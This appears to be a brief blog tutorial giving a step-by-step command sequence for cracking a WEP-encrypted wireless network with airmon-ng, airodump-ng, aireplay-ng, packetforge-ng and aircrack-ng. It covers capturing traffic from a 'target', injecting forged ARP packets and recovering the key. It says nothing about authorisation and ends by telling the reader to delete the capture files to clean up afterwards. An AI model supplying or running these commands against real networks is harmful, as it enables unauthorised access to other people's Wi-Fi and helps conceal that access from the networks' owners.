Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0
The second command shows WEP encrypted networks nearby
The third command starts capturing traffic from your target
airmon-ng start wlan0 #create interface man0 in monitor mode of wlan0
airodump-ng --encrypt WEP mon0 #shows APs with WEP only
airodump-ng -c [channel] --bssid [mac_of_ap] --ivs -w [filename] mon0
Now open a second terminal and run the following
The first line associates you with the mac (see terminal window 1)
The second line looks for an IV that you can replay.
The third line creates a packet that you replay in the fourth line
aireplay-ng -1 0 -a [mac_of_ap] -h [mac_of_wificard] wlan0
aireplay-ng -5 -b [mac_of_ap] -h [mac_of_wificard] wlan0 #answer Y to prompt
packetforge-ng -0 -a [mac_of_ap] -h [mac_of_wificard] -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet wlan0
aireplay-ng -2 -r arp-packet wlan0 #answer Y to prompt
Watch those packets fly up in reminal window 1!!!!
Open a new terminal window and run the following to start cracking
aircrack-ng -n 128 -b [mac_of_ap] *.ivs
Remember to clean up your crap once you have finished
rm *.ivs *.cap *.xor
And to simplify this i’ve made a bash script, see the apps page.